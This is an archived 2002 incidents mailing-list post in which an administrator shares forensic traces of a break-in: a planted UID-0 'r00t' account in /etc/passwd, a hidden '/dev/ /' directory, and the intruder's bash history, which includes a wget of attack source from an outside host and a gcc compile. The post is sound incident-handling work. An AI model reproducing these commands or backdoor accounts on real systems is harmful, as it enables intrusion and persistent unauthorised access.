watching them -after the fact
From: Alvin Oga (alvin.sec@Mail.Linux-Consulting.com)Date: 03/25/02
- Previous message: Rohrer, Mark E: "RE: Logon Banners"
- Next in thread: zeno: "Re: watching them -after the fact"
- Reply: zeno: "Re: watching them -after the fact"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sun, 24 Mar 2002 23:11:37 -0800 (PST) From: Alvin Oga <alvin.sec@Mail.Linux-Consulting.com> To: incidents@securityfocus.com
hi ya
this machine does NOT have su, wget, gcc installed
so they couldn't do much ???
they also created an empty dir: "/dev/ /"
( yes... a space as its filename )
c ya
alvin
cat /etc/passwd
...
-->> karlin::1001:1001::/tmp:/bin/bash
-->> r00t::0:0::/tmp:/bin/bash
cat /tmp/.bash_history
...
su r00t
su r00t
sudo
suidperl
uname -a
w
uname -a
exit
su r00t
uname -a
w
exit
w
su r00t
exit
w
su r00t
exit
wget turma85.hypermart.net/slice.c
gcc -o sl slice.c
exit
su r00t
w
exit
#
# end of history
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Previous message: Rohrer, Mark E: "RE: Logon Banners"
- Next in thread: zeno: "Re: watching them -after the fact"
- Reply: zeno: "Re: watching them -after the fact"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
